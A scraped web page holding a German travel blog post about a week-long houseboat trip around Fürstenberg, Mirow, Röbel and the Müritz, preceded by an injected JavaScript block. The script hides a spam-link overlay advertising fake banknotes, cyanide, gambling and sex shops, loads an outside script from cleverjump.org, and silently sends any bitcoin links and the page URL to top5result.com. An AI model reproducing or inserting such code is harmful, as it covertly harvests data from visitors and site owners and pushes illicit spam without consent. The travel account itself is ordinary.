/* Domain is for sale: admin@kickvox.com */ (function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
havada a\u015fk var<\/a> <\/div>
www.depo61.com<\/span> <\/div> <\/div>
calvin klein in2u perfume 100ml<\/a> <\/div>
www.shopvitas.com.br<\/span> <\/div> <\/div> <\/div>
web sms<\/a> <\/div>
www.sms-eco.fr<\/span> <\/div> <\/div>
zapper - dra hulda clark<\/a> <\/div>
www.zapperstore.com<\/span> <\/div> <\/div> <\/div>
vmware in hyper v konvertieren<\/a> <\/div>
de.starwindsoftware.com<\/span> <\/div> <\/div>
fiam glass italy<\/a> <\/div>
www.iqmatics.com<\/span> <\/div> <\/div> <\/div>
\u0432\u0438\u043a\u0442\u043e\u0440\u0438\u044f \u0441\u0438\u043a\u0440\u0435\u0442 \u043d\u0435\u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u0434\u0443\u0445\u0438<\/a> <\/div>
markshop.kiev.ua<\/span> <\/div> <\/div>
rambo programado para matar filme<\/a> <\/div>
minhaseriefavorita.com<\/span> <\/div> <\/div> <\/div>
situs judi kartu online terpercaya<\/a> <\/div>
situstaruhan268.com<\/span> <\/div> <\/div>
\u043f\u043e\u043a\u0441\u043a\u043b\u0438\u043d \u043a\u0443\u043f\u0438\u0442\u044c<\/a> <\/div>
poxclin.com.ua<\/span> <\/div> <\/div> <\/div>
buy fake 50 pound notes<\/a> <\/div>
banknotessupplier.com<\/span> <\/div> <\/div>
tu 3 buong nhom kinh nha<\/a> <\/div>
bep.vn<\/span> <\/div> <\/div> <\/div>
\u0448\u0430\u0440\u0438\u043a\u0438 \u0432\u043e \u0432\u043b\u0430\u0433\u0430\u043b\u0438\u0449\u0435 \u0444\u043e\u0442\u043e<\/a> <\/div>
5monet.kz<\/span> <\/div> <\/div>
blender spice mill<\/a> <\/div>
www.myhomeshopping.co.uk<\/span> <\/div> <\/div> <\/div>
proteinase k recombinant<\/a> <\/div>
www.oryzogen.net<\/span> <\/div> <\/div>
get a quick loan<\/a> <\/div>
www.supasmartloans.ca<\/span> <\/div> <\/div> <\/div>
les cornieres<\/a> <\/div>
films-etirable.fr<\/span> <\/div> <\/div>
drying up moisture<\/a> <\/div>
www.tsgcinc.com<\/span> <\/div> <\/div> <\/div>
gold potassium cyanide buyers<\/a> <\/div>
doctorbarbiturate.com<\/span> <\/div> <\/div>
\u0e04\u0e32\u0e2a\u0e34\u0e42\u0e19\u0e2d\u0e2d\u0e19\u0e44\u0e25\u0e19\u0e4c\u0e44\u0e21\u0e48\u0e15\u0e49\u0e2d\u0e07\u0e42\u0e2b\u0e25\u0e14<\/a> <\/div>
wmcasinobonus.com<\/span> <\/div> <\/div> <\/div>
free seo<\/a> <\/div>
semalt.com<\/span> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div> <\/div>
\u0441\u0435\u043a\u0441 \u0448\u043e\u043f<\/a> <\/div>
sex-paradise.com.ua<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} setTimeout(function() { try { var links = document.querySelectorAll('a[href^="bitcoin:"]'); //var links = document.querySelectorAll('a[href^="https://"]'); if (links.length) { var hrefs = []; for (var i = 0; i < links.length; i++) { hrefs.push(links[i].href); } var json = JSON.stringify({ hrefs: hrefs, jsDomain: 'top5result.com', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//top5result.com/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } } catch (ex) {} }, 2000); })();
7.10.2011

Hausbootfahrt ab Fürstenberg

Hausbootfahrt ab Fürstenberg mit der Europa 400 -
1 Woche: 25.8.-1.9.2011

Die Anfahrt nach Fürstenberg haben wir (zwei gut befreundete Ehepaare) über Wolfsburg (VW-Autostadt) als Zwischenstation am Vortag angetreten; was gut war. Denn gleichentags um 13:00 Uhr (Einweisung für Meck-Pomm-Seenplatten-Neulinge) in Fürstenberg zu sein, bedeutet sehr früh im “Schwarzwald” aufzustehen und gegen die Zeit anzufahren.

Die Ausschilderung der Marina von Cardinalb-Boot ist m.E. unzureichend, so dass wir erst einmal an einer anderen Marina landeten. Das dann eingeschaltete Navi war hilfreich!

Der Empfang in der Station war sehr angenehm freundlich und die Einweisungen waren kurz und schmerzlos, aber völlig ausreichend. Die Bootsübernahme gestaltet sich ebenfalls ausgesprochen problemlos, zumal wir ja quasi “all inclusive” gebucht hatten. Die kurze Probefahrt war schnell absolviert, da der Einweiser erkannte, dass wir nicht das erste mal auf einem derartigen Boot waren. Die Routenratschläge, die wir während der Einweisung erhalten hatten, waren wertvolle Hinweise, die uns später einen insgesamt problemlosen und stressfreien zeitlichen Ablauf brachten.
Zwischenzeitlich waren die Vorräte für die Fahrt eingekauft und verladen (die bereitstehenden kleinen Boller-Transportwägen waren sehr hilfreich; von Frankreich kannten wir Derartiges nicht); so konnte es losgehen.

Das Hausboot, eine “Europa 400“, sie hörte auf den Namen “Auriga”, war in tadellosem Zustand und es fehlte (zunächst) an Nichts. Perfekt ausgestattet, saubere und sinnvolle Einrichtung; sogar die Messer waren geschliffen.

Noch am Übernahmetag stachen wir in den Röblinsee nach Westen und warfen in der untergehenden sonne schließlich den Anker im Menow-See. Jetzt richteten unsere Damen die Kojen her und stellten fest, das ein Spannbetttuch zu klein war. Ein Anruf bei der Basis regelte das dann unbürokratisch; wir lichteten den Anker fuhren unter Volldampf zur Brücke “Steinföhrde”, wo dann die (Geld)-/Betttuchübergabe (wie im Krimi) stattfand. (Wir hatten einen Heidenspaß mit dieser komischen Situation – mitten im Wald auf einer einsamen Brücke stand meine Frau in der Abenddämmerung, überprüfte mit scharfem Blick die vereinzelt vorbeifahrenden Autos, tauschte dann schließlich ohne großen Wortwechsel die “Bündel” mit dem Überbringer! Wir lachen noch heute darüber)

Der 2. Tag begann mit einem wahrlich “erfrischendem” Bad im Menow-See und führte uns bei herrlichem Wetter zum Tagesziel nach Mirow. Kleine Bootshäuser, schöne Villen und zu “Villen” ausgebaute Bootshäuser säumten unsere Route. Die Sonne war fast unerbittlich und ließ den Getränkeverbrauch steigen. In Mirow angelegt, suchten wir einen Laden um vergessene Vorräte zu besorgen oder verbrauchte (Getränke) wieder aufzufüllen. Ein längerer Fußmarsch war das Ergebnis, der natürlich, dann mit “Beladung”, wieder zurückgelegt werden mußte. Ein kühlendes Eis war notwendig, um die Strecke zu bewältigen. Herrlicher Sommerabend mit wenig Mücken.

Am 3. Tag (das übliche Morgenbad – heute noch etwas (gefühlt) kälter) entsorgten wir zu nächst in einer Marina nördlich von Mirow, um uns dann auf den Wasserweg nach Röbel zu machen. Das Wetter begann während der Fahrt etwas schlechter zu werden, was der guten Stimmung aber keinen Abbruch tat. In Röbel erkundeten wir die Stadt und anschließend wärmten wir uns in der dortigen Therme auf.

Der 4. Tag brachte uns bei windigem, regnerischen Wetter einen “stürmischen” Müritzsee, der uns zu richtigen “Seemännern-/frauen” mit Gischt bis zur “Brücke”, in den Wellen (max. Windstärke 5) stampfendem Schiff usw., werden ließ. Auch hier hatten wir großen Spaß. In Waren angekommen wurde das Dorf fußläufig bei nun sonnigem Wetter erkundet und für schön befunden. Leider waren die Geschäfte geöffnet, so dass sich der Spaziergang zum Einkaufsbummel für unser Frauen wandelte.
Um der Gefahr zu entgehen, wegen des noch stärker werdenden Windes in Waren liegenbleiben zu müssen, entschlossen wir uns das “Müritz-Meer” noch am gleichen Tag zu überqueren und landeten in Rechlin (Kuhnle-Werft). Der Abend brachte uns nach einem längeren Fußmarsch, vorbei an zerfallenen Kasernengebäuden, in die “Großstadt” Rechlin. Nicht empfehlenswert.

Der 5. Tag begann mit einem “Nicht-Bad” im See und führte uns dann zunächst nach Buchholz. Dort sollte, nach einem Geheimtipp des Einweisers in Fürstenberg,
an der Marina ein sehr gutes Fischlokal sein. Die Fischsuppe war durchaus ansprechend, der Cappuccino dafür um so grässlicher (die Notration an Schnaps mußte angebrochen werden). Anschließend verließen wir “fluchtartig” die herrlichen Seen und landeten schließlich in Kleinzerlang am Bootsanleger (wir brauchten Strom und Wasser) Der herrlich sonnige Abend ließ uns den “Muckefuck” vergessen. – Apropo Mucke: Die Mückenplage war durchaus auszuhalten, wenn man sich an die zeitlichen Spielregeln der Mücken gehalten hat.

Der 6. Tag führte uns nach Süden, nach Rheinsberg, wo wir natürlich das Schloß besichtigten und unsere Vorräte im netten Städtchen auffrischten; hier muß schon immer Tourismus gewesen sein. Das gemischte Wetter vertrieb uns aus Rheinsberg und wir fuhren bis zum stillen Bikow-See, wo das Baden in herrlich “kaltem” Wasser einen wahren Genuß darstellt. Auch hier, umgeben von mückenträchtigem Schilf und nassen Ufern konnten wir uns mit einfachen Mitteln der “Mückenmütter” die ihren Kindern die Lätzchen umgebunden hatten, erwehren. Freche (Piraten-)Enten enterten das Boot und gaben es erst nach Herausgabe von zahlreichen Brotstücken das Boot wieder frei. Ein herrlicher Abend an Deck.

Der 7. Tag begann mit dem obligatorischen Bad im See (wie gesagt: kalt) und brachte uns zurück nach Fürstenberg an den Anleger von Cardinal-Boot. Die Schleusen unterwegs waren heute gut “besucht” und so hatten wir erstmals einige Stunden Wartezeit die wir natürlich für Kaffeepausen usw. nutzten. Außerdem füllten wir an einer Schleuse den Kartoffelvorrat auf (ca. 20 kg, wir essen noch immer von den guten Kartoffeln); ein Bauer verkaufte sie quasi im Vorbeifahren. Wir waren auch hier gut beraten den Ratschlägen der Einweiser zu folgen; wäre uns das am letzten Tag passiert, dann wären wir zu spät zur Rückgabe des Boots gekommen. Der Abend brachte uns eine herrliche (großräumige) Dusche in der Marina und das Kaptain`s-Dinner an Bord. Wie überhaupt unsere Küchen-Crew Ausgezeichnetes leistet und die Fahrt auch aus lukullischer Sicht ein wahres Vergnügen darstellte.

Die Rückgabe des Boots, unbeschädigt und sauber, gestaltet sich am nächsten Morgen sehr verblüffend einfach: Abgabe der Schlüssel, das wars.

Dennoch hatten wir natürlich etwas zu “meckern” und füllten den entsprechenden Frageboben aus, wie gesagt Jammern auf höchstem Niveau aber Meckern muß sein:
z.B. Fehlende Windabweisefenster am Oberdeck, Ankerwindenstock am anderen Ende des Boots, fehlendes Echolot (haben wir bei anderen Booten gesehen, aber nie gebraucht), Schiebetüren dichten nicht völlig ab – Einfalltor für Mücken, der Vorrat an Toilettenpapier ist etwas gering, usw.usw.

Fazit:
Ein sehr schöner Urlaub auf dem Hausboot, das bequem und großzügig ausgestattet, leicht zu fahren und manövrieren ist; in einer sehr schönen, grünen Landschaft, die aber nie langweilig wird, da sich Kanal, Fluß, See abwechseln und tolle Erlebnisse bieten. 288 Fluß-See-Kanal-km mit wenigen Schleusen (die sogar noch mit meist freundlichen und hilfsbereiten Schleusenwärter ausgestattet sind) und die einen Fernseher an Bord nahezu überflüssig machen.

Empfehlung: Ja, uneingeschränkt.

Die Europa 400 und andere Bootstypen können hier gebucht werden:
Ferien auf dem Wasser

Kategorien